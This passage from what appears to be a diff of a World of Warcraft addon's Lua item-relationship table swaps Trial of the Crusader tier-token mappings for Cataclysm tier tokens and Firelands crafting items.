- 48643, -- Turalyon's Handguards of Triumph - 48644, -- Turalyon's Faceguard of Triumph - 48645, -- Turalyon's Legguards of Triumph - 48646, -- Turalyon's Shoulderguards of Triumph - 48647, -- Liadrin's Shoulderguards of Triumph - 48648, -- Liadrin's Legguards of Triumph - 48649, -- Liadrin's Faceguard of Triumph - 48650, -- Liadrin's Handguards of Triumph - 48651, -- Liadrin's Breastplate of Triumph + -- Crown of the Forlorn Vanquisher + ["65002"] = { + 65181, -- Magma Plated Helmet + 65186, -- Magma Plated Faceguard + 65190, -- Stormrider's Headpiece + 65195, -- Stormrider's Helm + 65200, -- Stormrider's Cover + 65210, -- Firelord's Hood + 65241, -- Wind Dancer's Helmet }, - -- Regalia of the Grand Protector - ["47558"] = { - 48260, -- Windrunner's Spaulders of Triumph - 48261, -- Windrunner's Legguards of Triumph - 48262, -- Windrunner's Headpiece of Triumph - 48263, -- Windrunner's Handguards of Triumph - 48264, -- Windrunner's Tunic of Triumph - 48265, -- Windrunner's Tunic of Triumph - 48266, -- Windrunner's Handguards of Triumph - 48267, -- Windrunner's Headpiece of Triumph - 48268, -- Windrunner's Legguards of Triumph - 48269, -- Windrunner's Spaulders of Triumph - 48290, -- Nobundo's Spaulders of Triumph - 48291, -- Nobundo's Legguards of Triumph - 48292, -- Nobundo's Headpiece of Triumph - 48293, -- Nobundo's Handguards of Triumph - 48294, -- Nobundo's Tunic of Triumph - 48305, -- Thrall's Tunic of Triumph - 48306, -- Thrall's Handguards of Triumph - 48307, -- Thrall's Headpiece of Triumph - 48308, -- Thrall's Legguards of Triumph - 48309, -- Thrall's Spaulders of Triumph - 48321, -- Nobundo's Shoulderpads of Triumph - 48322, -- Nobundo's Kilt of Triumph - 48323, -- Nobundo's Helm of Triumph - 48324, -- Nobundo's Gloves of Triumph - 48325, -- Nobundo's Hauberk of Triumph - 48326, -- Thrall's Hauberk of Triumph - 48327, -- Thrall's Gloves of Triumph - 48328, -- Thrall's Helm of Triumph - 48329, -- Thrall's Kilt of Triumph - 48330, -- Thrall's Shoulderpads of Triumph - 48351, -- Nobundo's Shoulderguards of Triumph - 48352, -- Nobundo's War-Kilt of Triumph - 48353, -- Nobundo's Faceguard of Triumph - 48354, -- Nobundo's Grips of Triumph - 48355, -- Nobundo's Chestguard of Triumph - 48356, -- Thrall's Chestguard of Triumph - 48357, -- Thrall's Grips of Triumph - 48358, -- Thrall's Faceguard of Triumph - 48359, -- Thrall's War-Kilt of Triumph - 48360, -- Thrall's Shoulderguards of Triumph - 48381, -- Wrynn's Shoulderplates of Triumph - 48382, -- Wrynn's Legplates of Triumph - 48383, -- Wrynn's Helmet of Triumph - 48384, -- Wrynn's Gauntlets of Triumph - 48385, -- Wrynn's Battleplate of Triumph - 48396, -- Hellscream's Battleplate of Triumph - 48397, -- Hellscream's Gauntlets of Triumph - 48398, -- Hellscream's Helmet of Triumph - 48399, -- Hellscream's Legplates of Triumph - 48400, -- Hellscream's Shoulderplates of Triumph - 48433, -- Wrynn's Greathelm of Triumph - 48447, -- Wrynn's Legguards of Triumph - 48451, -- Wrynn's Breastplate of Triumph - 48453, -- Wrynn's Handguards of Triumph - 48455, -- Wrynn's Pauldrons of Triumph - 48466, -- Hellscream's Breastplate of Triumph - 48467, -- Hellscream's Handguards of Triumph - 48468, -- Hellscream's Greathelm of Triumph - 48469, -- Hellscream's Legguards of Triumph - 48470, -- Hellscream's Pauldrons of Triumph + -- Shoulders of the Forlorn Protector + ["65087"] = { + 65208, -- Lightning-Charged Spaulders + 65248, -- Mantle of the Raging Elements + 65253, -- Spaulders of the Raging Elements + 65258, -- Shoulderwraps of the Raging Elements + 65268, -- Earthen Pauldrons + 65273, -- Earthen Shoulderguards + }, + -- Shoulders of the Forlorn Conqueror + ["65088"] = { + 65218, -- Reinforced Sapphirium Pauldrons + 65223, -- Reinforced Sapphirium Mantle + 65228, -- Reinforced Sapphirium Shoulderguards + 65233, -- Mercurial Mantle + 65238, -- Mercurial Shoulderwraps + 65263, -- Shadowflame Mantle + }, + -- Shoulders of the Forlorn Vanquisher + ["65089"] = { + 65183, -- Magma Plated Pauldrons + 65188, -- Magma Plated Shoulderguards + 65193, -- Stormrider's Spaulders + 65198, -- Stormrider's Mantle + 65203, -- Stormrider's Shoulderwraps + 65213, -- Firelord's Mantle + 65243, -- Wind Dancer's Spaulders + }, + -- Magma Plated Battleplate + ["65179"] = { + 67425, -- Chest of the Forlorn Vanquisher + }, + -- Magma Plated Gauntlets + ["65180"] = { + 67431, -- Gauntlets of the Forlorn Vanquisher + }, + -- Magma Plated Helmet + ["65181"] = { + 65002, -- Crown of the Forlorn Vanquisher + }, + -- Magma Plated Legplates + ["65182"] = { + 67426, -- Leggings of the Forlorn Vanquisher + }, + -- Magma Plated Pauldrons + ["65183"] = { + 65089, -- Shoulders of the Forlorn Vanquisher + }, + -- Magma Plated Chestguard + ["65184"] = { + 67425, -- Chest of the Forlorn Vanquisher + }, + -- Magma Plated Handguards + ["65185"] = { + 67431, -- Gauntlets of the Forlorn Vanquisher + }, + -- Magma Plated Faceguard + ["65186"] = { + 65002, -- Crown of the Forlorn Vanquisher + }, + -- Magma Plated Legguards + ["65187"] = { + 67426, -- Leggings of the Forlorn Vanquisher + }, + -- Magma Plated Shoulderguards + ["65188"] = { + 65089, -- Shoulders of the Forlorn Vanquisher + }, + -- Stormrider's Grips + ["65189"] = { + 67431, -- Gauntlets of the Forlorn Vanquisher + }, + -- Stormrider's Headpiece + ["65190"] = { + 65002, -- Crown of the Forlorn Vanquisher }, - -- Regalia of the Grand Vanquisher - ["47559"] = { - 47758, -- Khadgar's Shoulderpads of Triumph - 47759, -- Khadgar's Robe of Triumph - 47760, -- Khadgar's Leggings of Triumph - 47761, -- Khadgar's Hood of Triumph - 47762, -- Khadgar's Gauntlets of Triumph - 47763, -- Sunstrider's Gauntlets of Triumph - 47764, -- Sunstrider's Hood of Triumph - 47765, -- Sunstrider's Leggings of Triumph - 47766, -- Sunstrider's Robe of Triumph - 47767, -- Sunstrider's Shoulderpads of Triumph - 48138, -- Malfurion's Spaulders of Triumph - 48139, -- Malfurion's Robe of Triumph - 48140, -- Malfurion's Leggings of Triumph - 48141, -- Malfurion's Headpiece of Triumph - 48142, -- Malfurion's Handguards of Triumph - 48143, -- Runetotem's Handguards of Triumph - 48144, -- Runetotem's Headpiece of Triumph - 48145, -- Runetotem's Leggings of Triumph - 48146, -- Runetotem's Robe of Triumph - 48147, -- Runetotem's Spaulders of Triumph - 48168, -- Malfurion's Mantle of Triumph - 48169, -- Malfurion's Vestments of Triumph - 48170, -- Malfurion's Trousers of Triumph - 48171, -- Malfurion's Cover of Triumph - 48172, -- Malfurion's Gloves of Triumph - 48173, -- Runetotem's Gloves of Triumph - 48174, -- Runetotem's Cover of Triumph - 48175, -- Runetotem's Trousers of Triumph - 48176, -- Runetotem's Vestments of Triumph - 48177, -- Runetotem's Mantle of Triumph - 48198, -- Runetotem's Shoulderpads of Triumph - 48199, -- Runetotem's Raiments of Triumph - 48200, -- Runetotem's Legguards of Triumph - 48201, -- Runetotem's Headguard of Triumph - 48202, -- Runetotem's Handgrips of Triumph - 48203, -- Malfurion's Handgrips of Triumph - 48204, -- Malfurion's Headguard of Triumph - 48205, -- Malfurion's Legguards of Triumph - 48206, -- Malfurion's Raiments of Triumph - 48207, -- Malfurion's Shoulderpads of Triumph - 48228, -- VanCleef's Pauldrons of Triumph - 48229, -- VanCleef's Legplates of Triumph - 48230, -- VanCleef's Helmet of Triumph - 48231, -- VanCleef's Gauntlets of Triumph - 48232, -- VanCleef's Breastplate of Triumph - 48233, -- Garona's Breastplate of Triumph - 48234, -- Garona's Gauntlets of Triumph - 48235, -- Garona's Helmet of Triumph - 48236, -- Garona's Legplates of Triumph - 48237, -- Garona's Pauldrons of Triumph - 48486, -- Thassarian's Shoulderplates of Triumph - 48487, -- Thassarian's Legplates of Triumph - 48488, -- Thassarian's Helmet of Triumph - 48489, -- Thassarian's Gauntlets of Triumph - 48490, -- Thassarian's Battleplate of Triumph - 48491, -- Koltira's Battleplate of Triumph - 48492, -- Koltira's Gauntlets of Triumph - 48493, -- Koltira's Helmet of Triumph - 48494, -- Koltira's Legplates of Triumph - 48495, -- Koltira's Shoulderplates of Triumph - 48543, -- Thassarian's Pauldrons of Triumph - 48544, -- Thassarian's Legguards of Triumph - 48545, -- Thassarian's Faceguard of Triumph - 48546, -- Thassarian's Handguards of Triumph - 48547, -- Thassarian's Chestguard of Triumph - 48548, -- Koltira's Chestguard of Triumph - 48549, -- Koltira's Handguards of Triumph - 48550, -- Koltira's Faceguard of Triumph - 48551, -- Koltira's Legguards of Triumph - 48552, -- Koltira's Pauldrons of Triumph + -- Stormrider's Legguards + ["65191"] = { + 67426, -- Leggings of the Forlorn Vanquisher }, - -- Saronite Swordbreakers - ["47570"] = { - 47556, -- Crusader Orb + -- Stormrider's Raiment + ["65192"] = { + 67425, -- Chest of the Forlorn Vanquisher }, - -- Saronite Swordbreakers - ["47571"] = { - 47556, -- Crusader Orb + -- Stormrider's Spaulders + ["65193"] = { + 65089, -- Shoulders of the Forlorn Vanquisher }, - -- Titanium Spikeguards - ["47572"] = { - 47556, -- Crusader Orb + -- Stormrider's Handwraps + ["65194"] = { + 67431, -- Gauntlets of the Forlorn Vanquisher }, - -- Titanium Spikeguards - ["47573"] = { - 47556, -- Crusader Orb + -- Stormrider's Helm + ["65195"] = { + 65002, -- Crown of the Forlorn Vanquisher }, - -- Sunforged Bracers - ["47574"] = { - 47556, -- Crusader Orb + -- Stormrider's Legwraps + ["65196"] = { + 67426, -- Leggings of the Forlorn Vanquisher }, - -- Sunforged Bracers - ["47575"] = { - 47556, -- Crusader Orb + -- Stormrider's Robes + ["65197"] = { + 67425, -- Chest of the Forlorn Vanquisher }, - -- Crusader's Dragonscale Bracers - ["47576"] = { - 47556, -- Crusader Orb + -- Stormrider's Mantle + ["65198"] = { + 65089, -- Shoulders of the Forlorn Vanquisher }, - -- Crusader's Dragonscale Bracers - ["47577"] = { - 47556, -- Crusader Orb + -- Stormrider's Gloves + ["65199"] = { + 67431, -- Gauntlets of the Forlorn Vanquisher }, - -- Black Chitin Bracers - ["47579"] = { - 47556, -- Crusader Orb + -- Stormrider's Cover + ["65200"] = { + 65002, -- Crown of the Forlorn Vanquisher }, - -- Black Chitin Bracers - ["47580"] = { - 47556, -- Crusader Orb + -- Stormrider's Leggings + ["65201"] = { + 67426, -- Leggings of the Forlorn Vanquisher }, - -- Bracers of Swift Death - ["47581"] = { - 47556, -- Crusader Orb + -- Stormrider's Vestment + ["65202"] = { + 67425, -- Chest of the Forlorn Vanquisher }, - -- Bracers of Swift Death - ["47582"] = { - 47556, -- Crusader Orb + -- Stormrider's Shoulderwraps + ["65203"] = { + 65089, -- Shoulders of the Forlorn Vanquisher }, - -- Moonshadow Armguards - ["47583"] = { - 47556, -- Crusader Orb + -- Lightning-Charged Tunic + ["65204"] = { + 67424, -- Chest of the Forlorn Protector }, - -- Moonshadow Armguards - ["47584"] = { - 47556, -- Crusader Orb + -- Lightning-Charged Gloves + ["65205"] = { + 67430, -- Gauntlets of the Forlorn Protector }, - -- Bejeweled Wizard's Bracers - ["47585"] = { - 47556, -- Crusader Orb + -- Lightning-Charged Headguard + ["65206"] = { + 65000, -- Crown of the Forlorn Protector }, - -- Bejeweled Wizard's Bracers - ["47586"] = { - 47556, -- Crusader Orb + -- Lightning-Charged Legguards + ["65207"] = { + 67427, -- Leggings of the Forlorn Protector }, - -- Royal Moonshroud Bracers - ["47587"] = { - 47556, -- Crusader Orb + -- Lightning-Charged Spaulders + ["65208"] = { + 65087, -- Shoulders of the Forlorn Protector }, - -- Royal Moonshroud Bracers - ["47588"] = { - 47556, -- Crusader Orb + -- Firelord's Gloves + ["65209"] = { + 67431, -- Gauntlets of the Forlorn Vanquisher }, - -- Titanium Razorplate - ["47589"] = { - 47556, -- Crusader Orb + -- Firelord's Hood + ["65210"] = { + 65002, -- Crown of the Forlorn Vanquisher }, - -- Titanium Razorplate - ["47590"] = { - 47556, -- Crusader Orb + -- Firelord's Leggings + ["65211"] = { + 67426, -- Leggings of the Forlorn Vanquisher }, - -- Breastplate of the White Knight - ["47591"] = { - 47556, -- Crusader Orb + -- Firelord's Robes + ["65212"] = { + 67425, -- Chest of the Forlorn Vanquisher }, - -- Breastplate of the White Knight - ["47592"] = { - 47556, -- Crusader Orb + -- Firelord's Mantle + ["65213"] = { + 65089, -- Shoulders of the Forlorn Vanquisher }, - -- Sunforged Breastplate - ["47593"] = { - 47556, -- Crusader Orb + -- Reinforced Sapphirium Battleplate + ["65214"] = { + 67423, -- Chest of the Forlorn Conqueror }, - -- Sunforged Breastplate - ["47594"] = { - 47556, -- Crusader Orb + -- Reinforced Sapphirium Gauntlets + ["65215"] = { + 67429, -- Gauntlets of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Helmet + ["65216"] = { + 65001, -- Crown of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Legplates + ["65217"] = { + 67428, -- Leggings of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Pauldrons + ["65218"] = { + 65088, -- Shoulders of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Breastplate + ["65219"] = { + 67423, -- Chest of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Gloves + ["65220"] = { + 67429, -- Gauntlets of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Headguard + ["65221"] = { + 65001, -- Crown of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Greaves + ["65222"] = { + 67428, -- Leggings of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Mantle + ["65223"] = { + 65088, -- Shoulders of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Chestguard + ["65224"] = { + 67423, -- Chest of the Forlorn Conqueror }, - -- Crusader's Dragonscale Breastplate - ["47595"] = { - 47556, -- Crusader Orb + -- Reinforced Sapphirium Handguards + ["65225"] = { + 67429, -- Gauntlets of the Forlorn Conqueror }, - -- Crusader's Dragonscale Breastplate - ["47596"] = { - 47556, -- Crusader Orb + -- Reinforced Sapphirium Faceguard + ["65226"] = { + 65001, -- Crown of the Forlorn Conqueror }, - -- Ensorcelled Nerubian Breastplate - ["47597"] = { - 47556, -- Crusader Orb + -- Reinforced Sapphirium Legguards + ["65227"] = { + 67428, -- Leggings of the Forlorn Conqueror }, - -- Ensorcelled Nerubian Breastplate - ["47598"] = { - 47556, -- Crusader Orb + -- Reinforced Sapphirium Shoulderguards + ["65228"] = { + 65088, -- Shoulders of the Forlorn Conqueror }, - -- Knightbane Carapace - ["47599"] = { - 47556, -- Crusader Orb + -- Mercurial Handwraps + ["65229"] = { + 67429, -- Gauntlets of the Forlorn Conqueror }, - -- Knightbane Carapace - ["47600"] = { - 47556, -- Crusader Orb + -- Mercurial Cowl + ["65230"] = { + 65001, -- Crown of the Forlorn Conqueror }, - -- Lunar Eclipse Robes - ["47601"] = { - 47556, -- Crusader Orb + -- Mercurial Legwraps + ["65231"] = { + 67428, -- Leggings of the Forlorn Conqueror }, - -- Lunar Eclipse Robes - ["47602"] = { - 47556, -- Crusader Orb + -- Mercurial Robes + ["65232"] = { + 67423, -- Chest of the Forlorn Conqueror }, - -- Merlin's Robe - ["47603"] = { - 47556, -- Crusader Orb + -- Mercurial Mantle + ["65233"] = { + 65088, -- Shoulders of the Forlorn Conqueror }, - -- Merlin's Robe - ["47604"] = { - 47556, -- Crusader Orb + -- Mercurial Gloves + ["65234"] = { + 67429, -- Gauntlets of the Forlorn Conqueror }, - -- Royal Moonshroud Robe - ["47605"] = { - 47556, -- Crusader Orb + -- Mercurial Hood + ["65235"] = { + 65001, -- Crown of the Forlorn Conqueror }, - -- Royal Moonshroud Robe - ["47606"] = { - 47556, -- Crusader Orb + -- Mercurial Leggings + ["65236"] = { + 67428, -- Leggings of the Forlorn Conqueror }, - -- Khadgar's Gauntlets of Triumph - ["47753"] = { - 47242, -- Trophy of the Crusade + -- Mercurial Vestment + ["65237"] = { + 67423, -- Chest of the Forlorn Conqueror }, - -- Khadgar's Hood of Triumph - ["47754"] = { - 47242, -- Trophy of the Crusade + -- Mercurial Shoulderwraps + ["65238"] = { + 65088, -- Shoulders of the Forlorn Conqueror }, - -- Khadgar's Leggings of Triumph - ["47755"] = { - 47242, -- Trophy of the Crusade + -- Wind Dancer's Tunic + ["65239"] = { + 67425, -- Chest of the Forlorn Vanquisher }, - -- Khadgar's Robe of Triumph - ["47756"] = { - 47242, -- Trophy of the Crusade + -- Wind Dancer's Gloves + ["65240"] = { + 67431, -- Gauntlets of the Forlorn Vanquisher }, - -- Khadgar's Shoulderpads of Triumph - ["47757"] = { - 47242, -- Trophy of the Crusade + -- Wind Dancer's Helmet + ["65241"] = { + 65002, -- Crown of the Forlorn Vanquisher }, - -- Khadgar's Shoulderpads of Triumph - ["47758"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Wind Dancer's Legguards + ["65242"] = { + 67426, -- Leggings of the Forlorn Vanquisher }, - -- Khadgar's Robe of Triumph - ["47759"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Wind Dancer's Spaulders + ["65243"] = { + 65089, -- Shoulders of the Forlorn Vanquisher }, - -- Khadgar's Leggings of Triumph - ["47760"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Tunic of the Raging Elements + ["65244"] = { + 67424, -- Chest of the Forlorn Protector }, - -- Khadgar's Hood of Triumph - ["47761"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Handwraps of the Raging Elements + ["65245"] = { + 67430, -- Gauntlets of the Forlorn Protector }, - -- Khadgar's Gauntlets of Triumph - ["47762"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Faceguard of the Raging Elements + ["65246"] = { + 65000, -- Crown of the Forlorn Protector }, - -- Sunstrider's Gauntlets of Triumph - ["47763"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Legwraps of the Raging Elements + ["65247"] = { + 67427, -- Leggings of the Forlorn Protector }, - -- Sunstrider's Hood of Triumph - ["47764"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Mantle of the Raging Elements + ["65248"] = { + 65087, -- Shoulders of the Forlorn Protector }, - -- Sunstrider's Leggings of Triumph - ["47765"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Cuirass of the Raging Elements + ["65249"] = { + 67424, -- Chest of the Forlorn Protector }, - -- Sunstrider's Robe of Triumph - ["47766"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Grips of the Raging Elements + ["65250"] = { + 67430, -- Gauntlets of the Forlorn Protector }, - -- Sunstrider's Shoulderpads of Triumph - ["47767"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Helmet of the Raging Elements + ["65251"] = { + 65000, -- Crown of the Forlorn Protector }, - -- Sunstrider's Shoulderpads of Triumph - ["47768"] = { - 47242, -- Trophy of the Crusade + -- Legguards of the Raging Elements + ["65252"] = { + 67427, -- Leggings of the Forlorn Protector }, - -- Sunstrider's Robe of Triumph - ["47769"] = { - 47242, -- Trophy of the Crusade + -- Spaulders of the Raging Elements + ["65253"] = { + 65087, -- Shoulders of the Forlorn Protector }, - -- Sunstrider's Leggings of Triumph - ["47770"] = { - 47242, -- Trophy of the Crusade + -- Hauberk of the Raging Elements + ["65254"] = { + 67424, -- Chest of the Forlorn Protector }, - -- Sunstrider's Hood of Triumph - ["47771"] = { - 47242, -- Trophy of the Crusade + -- Gloves of the Raging Elements + ["65255"] = { + 67430, -- Gauntlets of the Forlorn Protector }, - -- Sunstrider's Gauntlets of Triumph - ["47772"] = { - 47242, -- Trophy of the Crusade + -- Headpiece of the Raging Elements + ["65256"] = { + 65000, -- Crown of the Forlorn Protector }, - -- Kel'Thuzad's Hood of Triumph - ["47778"] = { - 47242, -- Trophy of the Crusade + -- Kilt of the Raging Elements + ["65257"] = { + 67427, -- Leggings of the Forlorn Protector }, - -- Kel'Thuzad's Robe of Triumph - ["47779"] = { - 47242, -- Trophy of the Crusade + -- Shoulderwraps of the Raging Elements + ["65258"] = { + 65087, -- Shoulders of the Forlorn Protector }, - -- Kel'Thuzad's Leggings of Triumph - ["47780"] = { - 47242, -- Trophy of the Crusade + -- Shadowflame Handwraps + ["65259"] = { + 67429, -- Gauntlets of the Forlorn Conqueror }, - -- Kel'Thuzad's Shoulderpads of Triumph - ["47781"] = { - 47242, -- Trophy of the Crusade + -- Shadowflame Hood + ["65260"] = { + 65001, -- Crown of the Forlorn Conqueror }, - -- Kel'Thuzad's Gloves of Triumph - ["47782"] = { - 47242, -- Trophy of the Crusade + -- Shadowflame Leggings + ["65261"] = { + 67428, -- Leggings of the Forlorn Conqueror }, - -- Kel'Thuzad's Gloves of Triumph - ["47788"] = { - 47557, -- Regalia of the Grand Conqueror + -- Shadowflame Robes + ["65262"] = { + 67423, -- Chest of the Forlorn Conqueror }, - -- Kel'Thuzad's Hood of Triumph - ["47789"] = { - 47557, -- Regalia of the Grand Conqueror + -- Shadowflame Mantle + ["65263"] = { + 65088, -- Shoulders of the Forlorn Conqueror }, - -- Kel'Thuzad's Leggings of Triumph - ["47790"] = { - 47557, -- Regalia of the Grand Conqueror + -- Earthen Battleplate + ["65264"] = { + 67424, -- Chest of the Forlorn Protector }, - -- Kel'Thuzad's Robe of Triumph - ["47791"] = { - 47557, -- Regalia of the Grand Conqueror + -- Earthen Gauntlets + ["65265"] = { + 67430, -- Gauntlets of the Forlorn Protector }, - -- Kel'Thuzad's Shoulderpads of Triumph - ["47792"] = { - 47557, -- Regalia of the Grand Conqueror + -- Earthen Helmet + ["65266"] = { + 65000, -- Crown of the Forlorn Protector + }, + -- Earthen Legplates + ["65267"] = { + 67427, -- Leggings of the Forlorn Protector }, - -- Gul'dan's Shoulderpads of Triumph - ["47793"] = { - 47557, -- Regalia of the Grand Conqueror + -- Earthen Pauldrons + ["65268"] = { + 65087, -- Shoulders of the Forlorn Protector }, - -- Gul'dan's Robe of Triumph - ["47794"] = { - 47557, -- Regalia of the Grand Conqueror + -- Earthen Chestguard + ["65269"] = { + 67424, -- Chest of the Forlorn Protector }, - -- Gul'dan's Leggings of Triumph - ["47795"] = { - 47557, -- Regalia of the Grand Conqueror + -- Earthen Handguards + ["65270"] = { + 67430, -- Gauntlets of the Forlorn Protector }, - -- Gul'dan's Hood of Triumph - ["47796"] = { - 47557, -- Regalia of the Grand Conqueror + -- Earthen Faceguard + ["65271"] = { + 65000, -- Crown of the Forlorn Protector }, - -- Gul'dan's Gloves of Triumph - ["47797"] = { - 47557, -- Regalia of the Grand Conqueror + -- Earthen Legguards + ["65272"] = { + 67427, -- Leggings of the Forlorn Protector }, - -- Gul'dan's Gloves of Triumph - ["47803"] = { - 47242, -- Trophy of the Crusade + -- Earthen Shoulderguards + ["65273"] = { + 65087, -- Shoulders of the Forlorn Protector }, - -- Gul'dan's Hood of Triumph - ["47804"] = { - 47242, -- Trophy of the Crusade + -- Chest of the Forlorn Conqueror + ["67423"] = { + 65214, -- Reinforced Sapphirium Battleplate + 65219, -- Reinforced Sapphirium Breastplate + 65224, -- Reinforced Sapphirium Chestguard + 65232, -- Mercurial Robes + 65237, -- Mercurial Vestment + 65262, -- Shadowflame Robes }, - -- Gul'dan's Leggings of Triumph - ["47805"] = { - 47242, -- Trophy of the Crusade + -- Chest of the Forlorn Protector + ["67424"] = { + 65204, -- Lightning-Charged Tunic + 65244, -- Tunic of the Raging Elements + 65249, -- Cuirass of the Raging Elements + 65254, -- Hauberk of the Raging Elements + 65264, -- Earthen Battleplate + 65269, -- Earthen Chestguard }, - -- Gul'dan's Robe of Triumph - ["47806"] = { - 47242, -- Trophy of the Crusade + -- Chest of the Forlorn Vanquisher + ["67425"] = { + 65179, -- Magma Plated Battleplate + 65184, -- Magma Plated Chestguard + 65192, -- Stormrider's Raiment + 65197, -- Stormrider's Robes + 65202, -- Stormrider's Vestment + 65212, -- Firelord's Robes + 65239, -- Wind Dancer's Tunic }, - -- Gul'dan's Shoulderpads of Triumph - ["47807"] = { - 47242, -- Trophy of the Crusade + -- Leggings of the Forlorn Vanquisher + ["67426"] = { + 65182, -- Magma Plated Legplates + 65187, -- Magma Plated Legguards + 65191, -- Stormrider's Legguards + 65196, -- Stormrider's Legwraps + 65201, -- Stormrider's Leggings + 65211, -- Firelord's Leggings + 65242, -- Wind Dancer's Legguards }, - -- Velen's Gloves of Triumph - ["47983"] = { - 47242, -- Trophy of the Crusade + -- Leggings of the Forlorn Protector + ["67427"] = { + 65207, -- Lightning-Charged Legguards + 65247, -- Legwraps of the Raging Elements + 65252, -- Legguards of the Raging Elements + 65257, -- Kilt of the Raging Elements + 65267, -- Earthen Legplates + 65272, -- Earthen Legguards }, - -- Velen's Cowl of Triumph - ["47984"] = { - 47242, -- Trophy of the Crusade + -- Leggings of the Forlorn Conqueror + ["67428"] = { + 65217, -- Reinforced Sapphirium Legplates + 65222, -- Reinforced Sapphirium Greaves + 65227, -- Reinforced Sapphirium Legguards + 65231, -- Mercurial Legwraps + 65236, -- Mercurial Leggings + 65261, -- Shadowflame Leggings }, - -- Velen's Leggings of Triumph - ["47985"] = { - 47242, -- Trophy of the Crusade + -- Gauntlets of the Forlorn Conqueror + ["67429"] = { + 65215, -- Reinforced Sapphirium Gauntlets + 65220, -- Reinforced Sapphirium Gloves + 65225, -- Reinforced Sapphirium Handguards + 65229, -- Mercurial Handwraps + 65234, -- Mercurial Gloves + 65259, -- Shadowflame Handwraps }, - -- Velen's Robe of Triumph - ["47986"] = { - 47242, -- Trophy of the Crusade + -- Gauntlets of the Forlorn Protector + ["67430"] = { + 65205, -- Lightning-Charged Gloves + 65245, -- Handwraps of the Raging Elements + 65250, -- Grips of the Raging Elements + 65255, -- Gloves of the Raging Elements + 65265, -- Earthen Gauntlets + 65270, -- Earthen Handguards }, - -- Velen's Shoulderpads of Triumph - ["47987"] = { - 47242, -- Trophy of the Crusade + -- Gauntlets of the Forlorn Vanquisher + ["67431"] = { + 65180, -- Magma Plated Gauntlets + 65185, -- Magma Plated Handguards + 65189, -- Stormrider's Grips + 65194, -- Stormrider's Handwraps + 65199, -- Stormrider's Gloves + 65209, -- Firelord's Gloves + 65240, -- Wind Dancer's Gloves }, - -- Velen's Shoulderpads of Triumph - ["48029"] = { - 47557, -- Regalia of the Grand Conqueror + -- Scales of Life + ["69109"] = { + 71617, -- Crystallized Firestone }, - -- Velen's Robe of Triumph - ["48031"] = { - 47557, -- Regalia of the Grand Conqueror + -- Apparatus of Khaz'goroth + ["69113"] = { + 71617, -- Crystallized Firestone }, - -- Velen's Leggings of Triumph - ["48033"] = { - 47557, -- Regalia of the Grand Conqueror + -- Living Ember + ["69237"] = { + 69936, -- Fists of Fury + 69937, -- Eternal Elementium Handguards + 69938, -- Holy Flame Gauntlets + 69939, -- Dragonfire Gloves + 69941, -- Gloves of Unforgiving Flame + 69942, -- Clutches of Evil + 69943, -- Heavenly Gloves of the Moon + 69944, -- Grips of Altered Reality + 69945, -- Don Tayo's Inferno Mittens + 69946, -- Warboots of Mighty Lords + 69947, -- Mirrored Boots + 69948, -- Emberforged Elementium Boots + 69949, -- Earthen Scale Sabatons + 69950, -- Footwraps of Quenched Fire + 69951, -- Treads of the Craft + 69952, -- Ethereal Footfalls + 69953, -- Endless Dream Walkers + 69954, -- Boots of the Black Flame }, - -- Velen's Cowl of Triumph - ["48035"] = { - 47557, -- Regalia of the Grand Conqueror + -- Branch of Nordrassil + ["69646"] = { + 71141, -- Eternal Ember }, - -- Velen's Gloves of Triumph - ["48037"] = { - 47557, -- Regalia of the Grand Conqueror + -- Seething Cinder + ["69815"] = { + 71085, -- Runestaff of Nordrassil + 71086, -- Dragonwrath, Tarecgosa's Rest }, - -- Zabra's Gloves of Triumph - ["48057"] = { - 47557, -- Regalia of the Grand Conqueror + -- Fists of Fury + ["69936"] = { + 69237, -- Living Ember }, - -- Zabra's Cowl of Triumph - ["48058"] = { - 47557, -- Regalia of the Grand Conqueror + -- Eternal Elementium Handguards + ["69937"] = { + 69237, -- Living Ember }, - -- Zabra's Leggings of Triumph - ["48059"] = { - 47557, -- Regalia of the Grand Conqueror + -- Holy Flame Gauntlets + ["69938"] = { + 69237, -- Living Ember }, - -- Zabra's Robe of Triumph - ["48060"] = { - 47557, -- Regalia of the Grand Conqueror + -- Dragonfire Gloves + ["69939"] = { + 69237, -- Living Ember }, - -- Zabra's Shoulderpads of Triumph - ["48061"] = { - 47557, -- Regalia of the Grand Conqueror + -- Gloves of Unforgiving Flame + ["69941"] = { + 69237, -- Living Ember }, - -- Zabra's Shoulderpads of Triumph - ["48062"] = { - 47242, -- Trophy of the Crusade + -- Clutches of Evil + ["69942"] = { + 69237, -- Living Ember }, - -- Zabra's Robe of Triumph - ["48063"] = { - 47242, -- Trophy of the Crusade + -- Heavenly Gloves of the Moon + ["69943"] = { + 69237, -- Living Ember }, - -- Zabra's Leggings of Triumph - ["48064"] = { - 47242, -- Trophy of the Crusade + -- Grips of Altered Reality + ["69944"] = { + 69237, -- Living Ember }, - -- Zabra's Cowl of Triumph - ["48065"] = { - 47242, -- Trophy of the Crusade + -- Don Tayo's Inferno Mittens + ["69945"] = { + 69237, -- Living Ember }, - -- Zabra's Gloves of Triumph - ["48066"] = { - 47242, -- Trophy of the Crusade + -- Warboots of Mighty Lords + ["69946"] = { + 69237, -- Living Ember }, - -- Velen's Handwraps of Triumph - ["48077"] = { - 47242, -- Trophy of the Crusade + -- Mirrored Boots + ["69947"] = { + 69237, -- Living Ember }, - -- Velen's Circlet of Triumph - ["48078"] = { - 47242, -- Trophy of the Crusade + -- Emberforged Elementium Boots + ["69948"] = { + 69237, -- Living Ember }, - -- Velen's Pants of Triumph - ["48079"] = { - 47242, -- Trophy of the Crusade + -- 